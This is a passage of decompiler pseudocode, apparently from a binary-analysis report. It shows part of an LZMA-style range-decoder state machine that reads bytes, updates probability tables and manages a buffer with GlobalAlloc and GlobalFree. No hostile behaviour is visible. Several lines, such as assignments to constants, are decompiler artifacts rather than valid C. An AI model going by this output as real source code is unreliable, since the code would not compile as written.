                                                                                                                                                                                                                            												L20:
                                                                                                                                                                                                                            												 *(_t612 - 0x48) = 5;
                                                                                                                                                                                                                            												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                                                            												goto L23;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											 *(_t612 - 0x74) = _t546;
                                                                                                                                                                                                                            											if( *(_t612 - 8) != 0) {
                                                                                                                                                                                                                            												GlobalFree( *(_t612 - 8));
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                                                                                                                                                            											 *(_t612 - 8) = _t534;
                                                                                                                                                                                                                            											if(_t534 == 0) {
                                                                                                                                                                                                                            												goto L171;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L20;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 2:
                                                                                                                                                                                                                            											L24:
                                                                                                                                                                                                                            											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                                                                                                                                                            											 *(_t612 - 0x84) = 6;
                                                                                                                                                                                                                            											 *(_t612 - 0x4c) = _t553;
                                                                                                                                                                                                                            											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                                                                            											goto L132;
                                                                                                                                                                                                                            										case 3:
                                                                                                                                                                                                                            											L21:
                                                                                                                                                                                                                            											__eflags =  *(_t612 - 0x6c);
                                                                                                                                                                                                                            											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(_t612 - 0x88) = 3;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                                                                            											_t67 = _t612 - 0x70;
                                                                                                                                                                                                                            											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                                                                            											__eflags =  *_t67;
                                                                                                                                                                                                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											L23:
                                                                                                                                                                                                                            											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                                                                                                                                                            											if( *(_t612 - 0x48) != 0) {
                                                                                                                                                                                                                            												goto L21;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											goto L24;
                                                                                                                                                                                                                            										case 4:
                                                                                                                                                                                                                            											L133:
                                                                                                                                                                                                                            											_t531 =  *_t605;
                                                                                                                                                                                                                            											_t588 = _t531 & 0x0000ffff;
                                                                                                                                                                                                                            											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                                                                                                                                                            											if( *(_t612 - 0xc) >= _t564) {
                                                                                                                                                                                                                            												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                                                                                                                                                            												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                                                                                                                                                            												 *(_t612 - 0x40) = 1;
                                                                                                                                                                                                                            												_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                                                            												__eflags = _t532;
                                                                                                                                                                                                                            												 *_t605 = _t532;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *(_t612 - 0x10) = _t564;
                                                                                                                                                                                                                            												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            												goto L139;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L137;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 5:
                                                                                                                                                                                                                            											L137:
                                                                                                                                                                                                                            											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(_t612 - 0x88) = 5;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                                                                                                                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                                                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											L139:
                                                                                                                                                                                                                            											_t533 =  *(_t612 - 0x84);
                                                                                                                                                                                                                            											goto L140;
                                                                                                                                                                                                                            										case 6:
                                                                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            												 *(__ebp - 0x34) = 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x84) = 7;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            												goto L132;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                                            											__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                                            											__cl = 8;
                                                                                                                                                                                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                                            											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                                            													_t98 = __ebp - 0x38;
                                                                                                                                                                                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                                            													__eflags =  *_t98;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                                                                            											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                                                                            												__ebx = 1;
                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 8);
                                                                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                                                                            												__ebx = 1;
                                                                                                                                                                                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                                            												goto L41;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 7:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                                            												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            												__al = __al & 0x000000fd;
                                                                                                                                                                                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            												goto L69;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            											 *(__ebp - 0x84) = 8;
                                                                                                                                                                                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            											goto L132;
                                                                                                                                                                                                                            										case 8:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            												 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                                                            												 *(__ebp - 0x84) = 9;
                                                                                                                                                                                                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											goto L132;
                                                                                                                                                                                                                            										case 9:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												goto L90;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                                                            											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                                            												goto L171;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                                            											__eflags = _t259;
                                                                                                                                                                                                                            											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                                                                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                                                                                            											goto L76;
                                                                                                                                                                                                                            										case 0xa:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            												goto L132;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                                            											goto L89;
                                                                                                                                                                                                                            										case 0xb:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                                            											L89:
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            											L90:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            											 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                                            											goto L69;
                                                                                                                                                                                                                            										case 0xc:
                                                                                                                                                                                                                            											L100:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t335 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t335;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            											goto L102;
                                                                                                                                                                                                                            										case 0xd:
                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t122 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t122;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											L39:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                                            												goto L48;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            											if(__ebx >= 0x100) {
                                                                                                                                                                                                                            												goto L54;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L41:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                                            											 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                                            											__eax = __eax + 1;
                                                                                                                                                                                                                            											__eax = __eax << 8;
                                                                                                                                                                                                                            											__eax = __eax + __ebx;
                                                                                                                                                                                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            											__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                                                                            												 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            												0x800 = 0x800 - __edx;
                                                                                                                                                                                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            												goto L39;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L37;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 0xe:
                                                                                                                                                                                                                            											L46:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t156 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t156;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											while(1) {
                                                                                                                                                                                                                            												L48:
                                                                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                                                                            													break;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												__edx = __ebx + __ebx;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                                                                            													_t170 = __edx + 1; // 0x1
                                                                                                                                                                                                                            													__ebx = _t170;
                                                                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													goto L46;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L54:
                                                                                                                                                                                                                            											_t173 = __ebp - 0x34;
                                                                                                                                                                                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                                            											__eflags =  *_t173;
                                                                                                                                                                                                                            											goto L55;
                                                                                                                                                                                                                            										case 0xf:
                                                                                                                                                                                                                            											L58:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											_t203 = __ebp - 0x70;
                                                                                                                                                                                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t203;
                                                                                                                                                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            											L60:
                                                                                                                                                                                                                            											__eflags = __ebx - 0x100;
                                                                                                                                                                                                                            											if(__ebx >= 0x100) {
                                                                                                                                                                                                                            												L55:
                                                                                                                                                                                                                            												__al =  *(__ebp - 0x44);
                                                                                                                                                                                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                                            												goto L56;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L61:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            											__edx = __ebx + __ebx;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            											__esi = __edx + __eax;
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            											__ax =  *__esi;
                                                                                                                                                                                                                            											 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            											__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												__cx = __ax;
                                                                                                                                                                                                                            												_t217 = __edx + 1; // 0x1
                                                                                                                                                                                                                            												__ebx = _t217;
                                                                                                                                                                                                                            												__cx = __ax >> 5;
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												 *__esi = __ax;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            												0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            												__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            												 *__esi = __cx;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            											 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            												goto L60;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 0x10:
                                                                                                                                                                                                                            											L110:
                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0xc);
